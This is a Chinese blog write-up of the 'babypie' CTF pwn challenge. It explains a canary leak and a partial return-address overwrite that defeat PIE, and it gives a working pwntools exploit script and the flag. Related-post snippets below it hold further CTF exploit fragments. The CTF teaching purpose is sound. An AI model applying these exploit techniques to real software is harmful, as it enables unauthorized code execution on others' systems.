linkctf_2018.7_babypie

最新推荐文章于 2022-11-19 20:42:23 发布
最新推荐文章于 2022-11-19 20:42:23 发布
阅读量850 收藏 1
点赞数
分类专栏: pwn 文章标签: 学习 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36918532/article/details/124250195
版权

linkctf_2018.7_babypie
检查安全保护,64位,保护全开

IDA:

并且存在后门,,但是地址都随机化了,不能够直接填写地址,需要通过与固定函数的偏移

可以看到把rbp泄露出来了,同时前面一个地址,不知道是不是canary(按理说会放在ebp-8的位置,也就是前面这个,但是canary一般是以00结尾的,这个没有00的原因是,不能写入那么多字节,由于’\x00’被覆盖掉了,如果不覆盖掉的话就会截断,后面的就不会打印出来了)现在要做的就是要把canary如何打印出来,或者是绕过,或者是劫持__stack_chk_fail

在这里插入图片描述

在这里插入图片描述

现在要做的就是将canary后两位补上00,然后canary泄露出来了,然后就是返回值怎么写呢?地址是随机的,但是从main–>A3E执行system只有最后一个字节不一样,所以只需要溢出返回值的最后一个字节就行了
在这里插入图片描述
在这里插入图片描述
payload = ‘a’*0x28 + p64(canary) + p64(0) + p8(0x3e),成功getshell

from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './babypie'
debug = 0
if debug:
    p = remote('node4.buuoj.cn', 26883)
else:
    p = process(file_name)
elf = ELF(file_name)
payload = 'a'*0x28
p.sendline(payload)
p.recvuntil("aaaa\n")
canary = (u64(p.recv(7).rjust(8,b'\x00'))) 
print(hex(canary),"----------")
payload = 'a'*0x28 + p64(canary) + p64(0) + p8(0x3e)
p.send(payload)
p.interactive()

flag{39032360-ca4e-47b2-b7ce-830802eafba4}

是脆脆啊
关注
专栏目录
tensor_proto.raw_data().empty() tensor_proto.float_data().empty() tensor_proto.double_data()解决
jacke121的专栏
02-20 3571
tensor_proto.raw_data().empty() || !tensor_proto.float_data().empty() || !tensor_proto.double_data().empty() || !tensor_proto.int64_data().empty() 报错代码: # -*- coding: utf-8 -*- import onnx impor...
2019.7.22 babypie(canary绕过)和一些调试技巧
DSR446的博客
08-12 938
1. 以上是程序的反编译代码和保护机制。我们可以看出他开了canary保护。我们运行一下程序,发现只要输入一定数额的字符,其可以保持正常功能。 2.canary总是保存在bp的上面,意是我们虽然开辟了48字节的空间,但真正能写的只有40字节。最近遇到一个pwn大佬,跟着他学到了很多gdb调试的技巧,我想把它结合这个题目记录下来。 3. 我们可以在代码中加入gdb.attach(io,’’),让程...
buuoj刷题记录 - linkctf_2018.7_babypie
qq_34010404的博客
03-18 385
检查程序保护: 拖进IDA看一下,只有一小段代码,存在溢出漏洞 main函数上面有个后门函数 覆盖ret地址到后门函数即可,由于开启了PIE,和Canary,不能直接溢出 下面这两行代码可以把canary打出来 最后由于后门函数入口地址和返回地址只有低字节不同,所以覆盖掉返回地址的低字节即可.,不需要获取程序基址. exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29231) payload = b'
2018 - 安恒杯 - babypie [stack partial overwrite]
ACdream
02-13 1365
明显的是缓冲区溢出呀,read函数可以多读 64位程序,开启了NX和PIE,且程序里有了system("/bin/sh") 目标:控制RIP到A3E函数即可~ 首先,要处理canary的问题~然后,覆盖返回地址~ partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址 exp如下: #!/usr/bin/e...
IntelliJIDEA_2018.3汉化包
06-04
IntelliJIDEA_2018.3汉化包,自测可用。解压后按照txt文档进行粘贴,重启IDEA后即可。IntelliJ IDEA 2018.3.2 (Ultimate Edition) 【汉化作者:平方X 汉化反馈:http://www.pingfangx.com】
Could not load dynamic library 'cublas64_11.dll';此类报错的dll资源
04-30
cublas64_10.dll+cublas64_11.dll+cublasLt64_11.dll+cudart64_101.dll+cudart64_110.dll+cudnn64_8.dll+cufft64_10.dll+curand64_10.dll+cusolver64_11.dll+cusolverMg64_11.dll+cusparse64_11.dll;...
xinetd-2.3.14-39.el6_4.x86_64.rpm
03-13
xinetd-2.3.14-39.el6_4.x86_64.rpm,安装telnet的时候使用
shape_predictor_68_face_landmarks.dat.bz2 68个标记点的dlib官方人脸识别模型
11-22
68个标记点的dlib官方人脸识别模型,用于构建dlib的特征提取器(predictor) 具体详见我的博客http://blog.csdn.net/sunmc1204953974
partial overwrite
最新发布
FUCKING12的博客
11-19 871
就是partial overwrite,个人理解就是栈上有一个地址,这个地址和你想利用的地址又十分相近,只差1,2个字节于是就可以通过爆破这1,2个字节来达到利用的目的。此题开了pie canary,有个后门函数,然后思路就是栈溢出到system这,泄露canary这参考。栈上ret处的地址我们可以爆破最后2个字节,来ret到getshell这个函数的地址来得到shell。栈溢出到system需要用到一个利用手法。
BUUCTF-pwn(12)
njh18790816639的博客
01-13 2918
[极客大挑战 2019]Not Bad orw类型,打开文件,读入内容,输出内容!但需要注意gadget! from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './bad' r = remote('node4.buuoj.cn',29934) #r = process(binary) elf = ELF(binary) mnap = 0x123000 jmp_rsp = 0x0400a01 r.r
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 497
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
[SUCTF2018]babyre
m0_46296905的博客
05-05 841
题目:[SUCTF2018]babyre C++写的64位bin文件 查找字符串定位到主函数 __int64 sub_140012460() { char *v0; // rdi __int64 i; // rcx char v3[48]; // [rsp+0h] [rbp-20h] BYREF char v4[32]; // [rsp+30h] [rbp+10h] char v5[184]; // [rsp+50h] [rbp+30h] BYREF char v6[60]; //
HCTF-2018-Official-Writeup
qq_24966613的博客
11-14 4865
HCTF 2018 Official WriteupSimplified Chinese VersionWebWarmupweb签到首先打开然后看F12啦,注释里提示是source.php,php审计,问题出在page=urldecode(_page = urldecode(p​age=urldecode(page); $_page = mb_substr( page,<spancl...
【pwn】 0ctf_2017_babyheap
Nothing
12-11 661
例行检查 保护全开。 分析程序。在fill函数中存在溢出,通overlap,泄露libc。然后fastbin attack。 from pwn import * io=remote('node3.buuoj.cn',27627) libc=ELF('./libc-2.23.so') def add(size): io.recvuntil('Command: ') io.send...
DDCTF2018第四扩展FSwriteup
iqiqiya的博客
04-20 1869
     鼠标右键查看属性 发现Pactera 猜测可能是压缩包密码 改下扩展名为.zip  发现果然有压缩包 输入Pactera 解压成功 出现一个file.txt 记事本打开后 发现各种字符 但是类型数目是一定的    结合题目提示 可以确定就是统计flag.txt中字数出现的频次(不确定可以先试试 统计下看看有没有什么规律)  写个脚本 (这里就得注意了 ...
vn_pwn_babybabypwn_1(SROP+栈迁移)
seaaseesa的博客
04-09 634
vn_pwn_babybabypwn_1 首先检查一下程序的保护机制 然后,我们用IDA分析一下 显然一个signreturn的系统调用,因此可以做SROP。由于开启了PIE,因此,我们不考虑程序的bss段,而是考虑glibc的bss段,因为重新一开始告诉了我们puts函数的地址,我们就可以知道glibc的地址。我们先利用read在glibc的bss段布置下rop,然后栈迁移过去即可...
BUUCTF [V&N2020 公开赛]babybabypwn
BengDouLove的博客
04-10 1090
先看一下,,所有保护机制都开启了 进入main的第二个函数,里面是这一堆东西 查了一下这个是沙盒机制,seccomp ,,这个seccomp_rule_add函数是给这个沙盒添加规则,意思是这个函数不能调用 这个函数的第三个参数,是代表函数的number,,别的不太清楚,网上也没有查到。。但是 59号代表的是execve函数 所以这个函数不能被调用,,也就是说无法得到系统权限了(吧) 所以这样...
V40 sys_config.fex配置详解:全志平台关键设置指南
7. **触摸按键(Tkey)**: - 对触摸按键的输入控制参数(tkey_para)进行了介绍。 8. **马达(Motor)**: - 马达控制功能的参数(motor_para),包括电机类型、速度和方向设置。 9. **闪存(NANDFlash)**: - 对NAND...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值